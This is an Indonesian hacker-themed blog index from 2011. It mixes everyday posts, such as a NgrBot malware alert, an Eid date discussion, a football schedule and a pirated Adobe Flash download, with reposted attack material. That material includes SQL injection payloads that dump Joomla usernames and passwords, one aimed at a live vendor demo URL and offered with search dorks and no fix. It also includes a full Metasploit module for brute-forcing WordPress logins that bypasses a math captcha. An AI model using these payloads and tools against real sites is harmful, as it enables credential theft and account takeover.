Gembelehe
Root@me~$ _
Today : | Time Now : | Safemode : ON
> / Facebook / Twitter / Heello /
Posts Title
Publisher
Perms
Comments
Date
Categories

NgrBot Variant: Hati-hati Account Facebook Anda
Puerz666
rwxr-xr-x
0 Comments
8/30/2011

• Post Title
NgrBot Variant: Hati-hati Account Facebook Anda
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/30/2011
• Categories
• Share Post

NgrBot
NgrBot Variant. Jangan merasa aneh jika salah satu kawan facebook Anda secara tiba-tiba mengirimkan chat yang berisi sebuah link/URL dan membuat penasaran lalu mengakses link tersebut. Setelah di buka, ternyata link tersebut mengarahkan untuk mendownload file dengan nama seperti yang terlihat pada gambar diatas. Sayangnya, file yang akan di download nantinya bukanlah file gambar dengan ekstensi (.jpg) melainkan file lain.

A. Info File
Nama Worm : NgrBot.D, NgrBot.E, NgrBot.F, NgrBot.G
Asal : Unknown
Ukuran File : Random
Packer : ~
Pemrograman : C++
Icon : Random
Tipe : Worm, Trojan, Keylogger
B. About Malware
Salah satu varian NgrBot sebelumnya sudah pernah di bahas di “http://virusindonesia.com/2011/08/09/ngrbot-trojan-pengambil-identitaspassword/” dan removernya (PCMAV Express for NgrBot) sudah bisa di dapatkan di sini “http://virusindonesia.com/2011/08/09/pcmav-express-for-ngrbot/”. Berikut adalah icon yang digunakan NgrBot.A sampai NgrBot.C dengan ciri khasnya yang membentuk karakter tertentu.
NgrBot.A
NgrBot.B
NgrBot.C
Dan sekarang sudah menyebar juga varian lainnya. Antara lain NgrBot.D dan NgrBot.E yang tidak lagi menggunakan icon berbentuk karakter, melainkan icon menyerupai image.
NgrBot.D
NgrBot.E
Varian lainnya yaitu NgrBot.F yang menggunakan icon bernuansa pornografi. Tergantung variannya, NgrBot membuat beberapa mutex yang berbeda, antara lain seperti terlihat dibawah ini.
Mutex
C. Companion/File yang dibuat
Tidak jauh berbeda dengan varian sebelumnya , setelah aktif di memory NgrBot akan mendownload beberapa file yang nantinya dijalankan pada saat startup Windows.
D. Pembersihan
Gunakan update build untuk mendeteksi keberadaan NgrBot, jika NgrBot telah menjangkiti komputer, gunakan PCMAV Express for NgrBot pada halaman http://virusindonesia.com/2011/08/09/pcmav-express-for-ngrbot/ untuk pembersihan secara menyeluruh.
PCMAV 5.4 Update Build2
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build2 telah hadir dengan penambahan 49 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
RapidShare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 5.4 Update Build2:
Camila.vbs
Camila.vbs.txt
Fandi.vbs.C
Fandi.vbs.C.inf
Invader.vbs.A
Invader.vbs.A.drp
Invader.vbs.B
Invader.vbs.B.drp
NgrBot.A.dat.variant
NgrBot.A.drp.A.variant
NgrBot.A.drp.B.variant
NgrBot.A.drp.C.variant
NgrBot.A.exe.A.variant
NgrBot.A.exe.B.variant
NgrBot.A.inf.variant
NgrBot.A.lnk.variant
NgrBot.A.variant
NgrBot.B.inf.variant
NgrBot.B.variant
NgrBot.C.variant
NgrBot.D.variant
NgrBot.E.variant
NgrBot.F.variant
NgrBot.G.variant
Pluto.C
Pluto.C.drp
Pluto.C.htm
Pluto.D
Redlof.vbs.B
Redlof.vbs.B.drp
Redlof.vbs.B.inf
RezaTera.B
RezaTera.B.drp
RezaTera.B.url
Rieysha-Jogja.E
Rieysha-Jogja.E.hosts
Rieysha-Jogja.E.vbs
Sabotage.D
SkylerElite.vbs
SkylerElite.vbs.B
SkylerElite.vbs.inf
SkylerElite.vbs.txt
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat
Zistro

sUmber

Adobe Flash CS5 Portable
Puerz666
rwxr-xr-x
0 Comments
8/29/2011

• Post Title
Adobe Flash CS5 Portable
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/29/2011
• Categories
• Share Post


Software yang bernama lengkap Adobe Flash Creative Suite 5 ini pasti sudah tidak asing di telinga kalian. Software yang berbasis animasi, Flash ini merupakan produk kebanggaan dari Adobe Corporation karena Fungsi dan Fiturnya yang sangat komplit dan Software ini adalah salah satu Software paling terkenal didunia, bayangkan saja hampir semua Animator menggunakan Software ini untuk melakukan tugasnya , sperti membuat animasi kartun , anime , bahkan membuat Game. Sangat kerenkan?.. Dan disini Adobe Flash CS5 yang Saya Share sudah dalam Versi Portable , jadi Anda tidak perlu repot-repot menginstalnya, Tinggal klik aja,,hehe Langsung aja Yuk CekiDorr!
Screenshot :


LINK DOWNLOAD


Download Flash CS 5 Portable  (242 MB) ~ File dalam bentuk .EXE

Cara Akses Gemscool untuk SMART Fren
Puerz666
rwxr-xr-x
0 Comments
8/29/2011

• Post Title
Cara Akses Gemscool untuk SMART Fren
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/29/2011
• Categories
• Share Post

Assalamu alaikum WR WB
Nah disini saya kasih tau tips buat akses game dari gemscool bagi pengguna smart Fren

1.Cara buka web gemscool
Buka browser > Options> Network>Advanced
nah pilih use proxy
isi dengan 10.17.27.250 port 8080
OK..
Sekarang agan test deh buka web gemscool..

2. Cara maen game gemscool

1. Download software di proxy
(ane sih download yg ProxifierPE.exe [pilih yang size nya 3,5mb])
2. Extract kemudian jalankan Proxifier.exe
3. Options > proxy setting > Add > kemudian isi Address 10.17.27.250
dengan port 8080 Protocol dichek HTTPS
Sekarang test deh sama agan bisa kan?

Sumber Gemscool

Script Anti Blok Ato CTRL +A
Puerz666
rwxr-xr-x
0 Comments
8/29/2011

• Post Title
Script Anti Blok Ato CTRL +A
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/29/2011
• Categories
• Share Post

Baiklah saya tidak akan panjang lebar untuk menjelaskan trik ini mungkin para sobat semua sudah paham atau penah mengunjungi situs web / blog yang kontennya tidak bisa diblok sama sekali sehingga sulit untuk di bajak. Jika tertarik dan berminat untuk menerapkannya di blogspot silakan ikuti langkah-langkah berikut :

  1. Login ke Blogger
  2. Klik Rancangan
  3. Klik tab Edit HTML
  4. Beri tanda centang pada kotak kecil  Expand Template Widget
  5. Silahkan cari di dalam template anda kode <head>

Kalau sudah ketemu, anda Copy Pastekan script yang ada berikut tepat dibawah kode <head>.
<SCRIPT type="text/javascript">
if (typeof document.onselectstart!="undefined") {
document.onselectstart=new Function ("return false");
}
else{
document.onmousedown=new Function ("return false");
document.onmouseup=new Function ("return true");
}
</SCRIPT>
Klik Simpan Template dan lihatlah hasilnya
Dengan cara ini tulisan di blog kita tidak bisa di blok, sehingga copy paste dapat diminimalisir.

hari raya idul fitri kemungkinan mundur
Puerz666
rwxr-xr-x
2 Comments
8/29/2011

• Post Title
hari raya idul fitri kemungkinan mundur
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/29/2011
• Categories
• Share Post



[img]



penjelasan
Prediksi Awal Bulan Syawwal 1432 Hijriyah

Oleh : Mutoha Arkanuddin

Diposting oleh : admin

Pada 9 Agustus 2011



Lebaran tahun ini dikhawatirkan akan berbeda hari antara penetapan pemerintah (Isbat) yang diperkirakan menetapkan 1 Syawwal 1432 H jatuh pada Rabu (31/8) dengan keputusan Muhammadiyah yang sejak awal menetapkan 1 Syawwal jatuh pada Selasa (30/8). Hal ini juga terlihat dari kalender mereka yang mencantumkan tanggal 1 Syawwal yang berbeda dengan kalender resmi pemerintah. Sementara NU, Persis dipastikan akan mengikuti keputusan pemerintah yaitu berlebaran pada Rabu (31/8) karena secara kebetulan berdasarkan kriteria yang mereka gunakan menghasilkan kesimpulan yang sama.



Senin (29/8) sore merupakan saat pelaksanaan rukyatul hilal untuk menentukan awal bulan Syawwal 1432 Hijriyah. Sore itu untuk wilayah Yogyakarta, Matahari terbenam pada pukul 17:38 WIB pada azimuth 279° 22' atau 9,3° di Utara titik Barat. Tinggi Hilal (Bulan) saat Matahari terbenam 1,8° di atas horizon di Selatan Matahari. Bulan terbenam pada 17:47 WIB pada azimuth 273°12'. Pada kondisi ini secara astronomis Hilal mustahil dapat dirukyat. Lalu kenapa berangkat rukyat? Ya setidaknya memastikan hilal tidak terlihat.

RHI Yogyakarta merencanakan akan melakukan rukyatul hilal bersama Tim BHR DIY di POB Bela-belu Parangkusumo Yogyakarta pada Senin, 29 Agustus 2011 dan Selasa, 30 Agustus 2011 di POB Bela-belu Parangkusumo, Bantul Yogyakarta. Seperti halnya tahun lalu, tahun ini juga RHI menjadi salah satu Tim rukyat nasional dari 14 lokasi Rukyat Nasional di Indonesia kerjamasama antara BHR Kemenag DIY, Telkom DIY, Kominfo dan Bosscha. Hasil Streaming online Hilal 2011 ini dapat dilihat di website berikut :

.: http://hilal.kominfo.go.id .:. http://bosscha.itb.ac.id/hilal .:. http://rukyatulhilal.org .:


hasil ini merupakan masih perkiraan
sumber :http://rukyatulhilal.org/

perbedaan sudah biasa dalam penentuan 1 syawal di indonesia, marilah perbedaan ini dijadikan momentum kebersamaan dan toleransi umat beragama


terimah kasih unttuk yang kasih cendol mudah mudahan rejeki selalu pada anda
dan yang minta reques page one maaf gan ane masih belajar lum tahu jadi maaf yaa, tapi akan ane coba

tambahan referensi dari agan sekalian

Quote:
Originally Posted by Bernandin View Post
tolong jangan di banding2kan antara ilmu dunia dng ilmu agama

sebagai umat islam ibadah kita (bulan ramadhan, hari raya idul fitri dan hari raya besar idul adha, bulan haji, dll) patokan/penentuannya melihat tanggal dari tahun HIJRIAH (tahun peredaran bulan) bukan tahun MASEHI. krn ini sudah ketentuan ajaran agama ISLAM (Al Quran dan Al Hadist) yg kami anut dan yakini.


berkaitan dng negara lain bisa kebulan itu ngak ada sangkut pautnya dng kegiatan agama atau ibadah.

itu mah ilmu/urusan dunia harus dibandingkan juga dng ilmu dunia dong.

contoh... Indonesia masih ketinggalan monorelnya, padahal negara tetangga sudah punya monorel, atau bahkan amerika aja sudah ada alat trasnportasi ke bulan.

referensi tambahan

http://id.wikipedia.org/wiki/Kalender_Hijriyah


UPDATE

Dari kemntrian Agama
Menag Akan Pimpin Sidang Itsbat Penetapan 1 Syawal 1432 H Pada Senin Sore, 29 Agustus 2011
Pengumuman

Pengamatan Hilal Syawal 1432 H akan dilaksanakan tanggal 29 dan 30 Agustus 2011. Tim akan standby sejak tengah hari untuk setting alat dan kalibrasi. Streaming akan dilakukan sekitar 2 jam sebelum matahari terbenam dengan prosedur:

- 2 jam : live panoramik
- 1 jam : live matahari

- 30 menit : pencarian



Prosedur diatas bisa saja berubah tergantung kondisi di lapangan.



WIT = GMT + 9
WITA = GMT + 8

WIB = GMT + 7

ada live streaming cctv
biak - papua http://bosscha.itb.ac.id/hilal/content/view/64/100/
kupang - ntt http://bosscha.itb.ac.id/hilal/content/view/66/101/
makasar - sulawesi selatan http://bosscha.itb.ac.id/hilal/content/view/62/102/
mataram - ntb http://bosscha.itb.ac.id/hilal/content/view/72/103/
denpasar - bali http://bosscha.itb.ac.id/hilal/content/view/58/114/
spd lapan pontianak http://bosscha.itb.ac.id/hilal/content/view/68/104/
bangkalan - jawa timur http://bosscha.itb.ac.id/hilal/content/view/76/105/
yogjakarta http://bosscha.itb.ac.id/hilal/content/view/70/106/
universitas pendidikan indonesia jabar http://bosscha.itb.ac.id/hilal/content/view/78/110/
Pameungpeuk Garut - Jawa Barat http://bosscha.itb.ac.id/hilal/content/view/79/111/
lampung http://bosscha.itb.ac.id/hilal/content/view/82/115/
UIN Sultan Syarif Kasim - Riau http://bosscha.itb.ac.id/hilal/content/view/74/108/
medan sumut http://bosscha.itb.ac.id/hilal/content/view/83/116/
Lhoknga - NAD http://bosscha.itb.ac.id/hilal/content/view/60/109/

mari kita pantau sambil ngaskus. Streaming akan dilakukan sekitar 2 jam sebelum matahari terbenam dengan prosedur:
- 2 jam : live panoramik
- 1 jam : live matahari
- 30 menit : pencarian
Prosedur diatas bisa saja berubah tergantung kondisi di lapangan.
kita tunggu hasilnya. hasil sidang akan ane update terus gan

Sumber Kaskus.us

Joomla Minitek FAQ Book 1.3 SQL Injection
Puerz666
rwxr-xr-x
0 Comments
8/22/2011

• Post Title
Joomla Minitek FAQ Book 1.3 SQL Injection
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/22/2011
• Categories
• Share Post

#############################################################################################################
## Joomla Component Minitek FAQ Book SQL injection			                                               ##
## Author : kaMtiEz (kamtiez@exploit-id.com)								                               ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id	       ##
## Date : 11 June, 2011 						                                                           ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.minitek.gr/
[+] Download : http://www.minitek.gr/extensions/joomla-16/joomla-16-free-extensions/item/33-faq-book.html
[+] version : 1.3 or lower maybe also affected
[+] Vulnerability : SQLi
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/faq-book?view=category&id=[SQLi]

[SQLi]

-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--

[ DEMO ]

http://www.minitek.gr/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--

[ FIX ]

dunno :">

#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s13doeL,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,ulow
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,kampreto
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ] 

[+] edan tenan rasane atiku ...
[+] yowes ora popo :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

webdesQ sql injection vulnerability
Puerz666
rwxr-xr-x
0 Comments
8/22/2011

• Post Title
webdesQ sql injection vulnerability
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/22/2011
• Categories
• Share Post

#Exploit Title: webdesQ sql injection vulnerability
#Date:02/07/2011
#Author:XaDaL
#Software Link: http://www.webdesq.nl/
#Tested on: windows xp
#google dork: inurl: “powered by webdesQ”
#########################################################
/EXPLOIT
http://[localhost]/index.php?id=26&news_id=[SQLI]
http://[localhost]/index.php?id=26&news=[SQLI]
/EXAMPLE:
http://[localhost]/index.php?id=62&news_id=2127 union select
1,2,3,4,5,6,7–
http://[localhost]/index.php?id=24&news=166 union select
1,version(),3,4,5,6,7–
##########################################################
Thank’s to: xr0b0t
,kaMtiez,1bliez,jundab,boebefa,ulow,ryanaby,kampret0,hmei7
#virgi,hakz,dr.CruZz,geni212,red robot ,a17z,rj-45,anharku,jos_ali_joe
#arianom,tukulesto,cimpli,contrex,t3ll0,
#all members magelangcyber team,indonesiancoder and indonesian hacker
for aya “i love u ” :*

Jadwal Piala Dunia 2014
Puerz666
rwxr-xr-x
0 Comments
8/22/2011

• Post Title
Jadwal Piala Dunia 2014
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/22/2011
• Categories
• Share Post

Inilah jadwal pertandingan Timnas Indonesia di ajang Pra-Piala Dunia 2014 Cekidooottzz:



Jadwal Pra Piala Dunia 2014 Zona Asia

2 September 2011

Iran vs Indonesia


Bahrain vs Qatar



Jadwal Pra Piala Dunia 2014 Zona Asia

6 September 2011

Qatar vs Iran

Indonesia vs Bahrain



Jadwal Pra Piala Dunia 2014 Zona Asia

11 Oktober 2011

Iran vs Bahrain


Indonesia vs Qatar



Jadwal Pra Piala Dunia 2014 Zona Asia

11 November 2011

Qatar vs Indonesia

Bahrain vs Iran



Jadwal Pra Piala Dunia 2014 Zona Asia

15 November 2011

Qatar vs Bahrain


Indonesia vs Iran



Jadwal Pra Piala Dunia 2014 Zona Asia


29 Februari 2012

Iran vs Qatar

Bahrain vs Indonesia



"Jadwal Pra Piala Dunia 2014 Zona Asia" ini bisa membantu para supporter Timnas Indonesia untuk melihat dan mendukung tim Merah Putih kita.


Cara Ganti Nama Facebook Yang Sudah Tidak Bisa Diganti (Limit)
Puerz666
rwxr-xr-x
0 Comments
8/22/2011

• Post Title
Cara Ganti Nama Facebook Yang Sudah Tidak Bisa Diganti (Limit)
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/22/2011
• Categories
• Share Post

Name Change Limit Reached
Sorry! You've updated your name the maximum number of times allowed and your name can't be changed again. To list another name you go by, such as a maiden name, please use the Alternate Name field below. Akibat Beberapa kali Mengganti Nama Di facebook
Name Change Limit Reached
Itulah Tampilan yang muncul saat aku mau ganti nama di salah satu akun facebookku, Name Change Limit Reached yang artinya sudah melewati batas untuk mengganti nama di facebook dan kita tidak bisa mengganti nama kita dengan nama baru, Kita cuman bisa mengganti dengan nama-nama yang dulu pernah kita pakai.
Name Change Limit Reached yang aku alami tersebut gara-gara aku siang tadi keseringan merubah-namaku,walau sebenarnya tidak terlalu sering hanya beberapa kali, masih dalam tahap wajar menurutku.
Semuanya berawal saat aku googling dan menemukan sebuah thread Yang menurutku layak dicoba di forum kaskus yaitu Cara bikin Username hilang di FB
Lalu aku mengikuti langkah langkah yang diberikan di situ, Akan tetapi pertama kali mencoba gagal dikarenakan ternyata di komputer warnet yang aku gunakan belum terinstal  FONT ARIAL UNICODE MS sedangkan untuk merubah Nama facebook kita agar tidak kelihatan memerlukan sebuah karakter tidak kelihatan dari font arial unicode ms tersebut.

Lalu iseng-iseng lagi coba dirumah mengganti nama akun facebookku beberapa kali, nah mungkin gara-gara itu aku sekarang sudah tidak bisa lagi mengganti nama facebookku. Jadi buat sobat Gaptek yang sering mengganti atau merubah nama facebooknya aku sarankan jangan terlalu sering deh, karena akibatnya sobat tidak bisa lagi merubah nama fb dengan nama yang baru, !
Oh iya di kolom komentar di bawah ada beberapa sobat yang juga memberikan tips trik bagaimana mengganti nama Facebook yang sudah tidak bisa diganti atau limited. Mungkin sobat bisa mencobanya.
Caranya mengganti nama facebook yang sudah di limit :
Kita membuat seolah-olah akun Facebook kita dicoba disusupi (hack) oleh orang lain lalu kita mengembalikan lagi akun kita tersebut. Nah pada saat proses pemulihan akun Fb tersebutlah akan muncul opsi untuk merubah nama facebook kita.

Apabila sobat ingin mengganti nama facebook yang sudah dilimit. Pertama tama sobat buka dulu Link di Facebook yang bisa membuat fb kita di hack  yang gunanya untuk melaporkan kalau akun facebook pernah di hack : http://www.facebook.com/hacked/
Kemudian akan muncul menu untuk pemulihan akun facebook nah pada step ketiga akan muncul pilihan memperbaiki nama akun facebook. Di step ketiga inilah yang kita manfaatkan untuk mengganti nama facebook yang padahal sebelumnya tidak bisa diganti lagi.

Klik "Ganti"
Muncul lagi pilihan untuk mengganti nama facebook :)





Komentar di bawah beberapa mengatakan kalau trik ini tidak berfungsi,  tapi hari ini 9 juli 2011 masih bisa aku mencoba mengganti namaku yang sudah limit .
Ini buktinya : 

Makasih

Semoga Bermanfaat

WordPress Block-Spam-By-Math-Reloaded Plugin Bypass
Puerz666
rwxr-xr-x
0 Comments
8/21/2011

• Post Title
WordPress Block-Spam-By-Math-Reloaded Plugin Bypass
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/21/2011
• Categories
• Share Post

##
# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

 
class Metasploit3 < Msf::Auxiliary
 
	include Msf::Exploit::Remote::HttpClient
	include Msf::Auxiliary::AuthBrute
	include Msf::Auxiliary::Report
	include Msf::Auxiliary::Scanner
 
 
	def initialize
		super(
			'Name'           => 'Wordpress Brute Force and User Enumeration Utility',
			'Version'        => '$Revision: 12196 $',
			'Description'    => 'Wordpress Authentication Brute Force and User Enumeration Utility',
			'Author'         => [
				'Alligator Security Team',
				'Tiago Ferreira <tiago.ccna[at]gmail.com>',
        'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass
		],
			'References'     =>
				[
					['BID', '35581'],
					['CVE', '2009-2335'],
					['OSVDB', '55713'],
				],
			'License'        =>  MSF_LICENSE
		)
 
		register_options(
			[ Opt::RPORT(80),
				OptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']),
				OptBool.new('VALIDATE_USERS', [ true, "Enumerate usernames", true ]),
				OptBool.new('BSBM_BYPASS', [ true, "Block-Spam-By-Math-Reloaded Bypass ", false]),
				OptBool.new('BRUTEFORCE', [ true, "Perform brute force authentication", true ]),
		], self.class)
 
	end
 
	def target_url
		"http://#{vhost}:#{rport}#{datastore['URI']}"
	end
 
 
	def run_host(ip)
		if datastore['VALIDATE_USERS']
			@users_found = {}
			vprint_status("#{target_url} - WordPress Enumeration - Running User Enumeration")
			each_user_pass { |user, pass|
				do_enum(user)
			}
 
			unless (@users_found.empty?)
				print_good("#{target_url} - WordPress Enumeration - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
			end
		end
 
		if datastore['BRUTEFORCE']
			vprint_status("#{target_url} - WordPress Brute Force - Running Bruteforce")
			if datastore['VALIDATE_USERS']
				if @users_found && @users_found.keys.size > 0
					vprint_status("#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
				else
					vprint_status("#{target_url} - WordPress Brute Force - No valid users found. Exiting.")
					return
				end
			end
			each_user_pass { |user, pass|
				if datastore['VALIDATE_USERS']
					next unless @users_found[user]
				end
					do_login(user, pass)
			}
		end
	end
 
	def do_enum(user=nil)
		post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login"
		print_status("#{target_url} - WordPress Enumeration - Checking Username:'#{user}'")
 
		begin
 
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => datastore['URI'],
				'data'    => post_data,
			}, 20)
 
 
			valid_user = false
 
			if (res and res.code == 200 )
				if (res.body.to_s =~ /Incorrect password/ )
					valid_user = true
 
				elsif (res.body.to_s =~ /document\.getElementById\(\'user_pass\'\)/ )
					valid_user = true
 
				else
					valid_user = false
 
				end
 
			else
				print_error("#{target_url} - WordPress Enumeration - Enumeration is not possible. #{res.code} response")
				return :abort
 
			end
 
			if valid_user
				print_good("#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID")
				report_auth_info(
					:host => rhost,
					:sname => 'http',
					:user => user,
					:port => rport,
					:proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}"
				)
 
				@users_found[user] = :reported
				return :next_user
			else
				vprint_error("#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'")
				return :skip_user
			end
 
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
		rescue ::Timeout::Error, ::Errno::EPIPE
		end
	end
 
  def smartaleck(values)
    answer = 0 
    values.each { |a| answer+=a.to_i }
    return answer
  end
 
  def getvalues(response)
    i = 0 
    values = []
    while (i <= 1) do
        response.body.match(%r{.?(mathvalue#{i}).*(value=).([\d]+)})
        values[i] = $3
        i += 1
    end 
    return values
  end
 
  def baserequest()
    begin
    res = send_request_cgi({
        'method'  => 'GET',
        'uri'     => datastore['URI'],
      }, 20) 
    return res
    end
  end
 
 
	def do_login(user=nil,pass=nil)
    if (datastore['BSBM_BYPASS'])
      v = getvalues(baserequest())
      sec_answer = smartaleck(v)
		  post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login"
    else
		  post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&wp-submit=Login"
		  vprint_status("#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")
    end
 
		begin
 
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => datastore['URI'],
				'data'    => post_data,
			}, 20)
 
			if (res and res.code == 302 )
				if res.headers['Set-Cookie'].match(/wordpress_logged_in_(.*);/i)
					print_good("#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
					report_auth_info(
						:host => rhost,
						:port => rport,
						:sname => 'http',
						:user => user,
						:pass => pass,
						:proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}",
						:active => true
					)
 
					return :next_user
				end
 
				print_error("#{target_url} - WordPress Brute Force - Unrecognized 302 response")
				return :abort
 
			elsif res.body.to_s =~ /login_error/
				vprint_error("#{target_url} - WordPress Brute Force - Failed to login as '#{user}'")
				return
			else
				print_error("#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response") if res
				return :abort
			end
 
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
		rescue ::Timeout::Error, ::Errno::EPIPE
		end
	end
end
 

Indonesian Blog
Skin Edited by: ./Gembelehe Blog
Thanks To p4r46hcyb3rn3t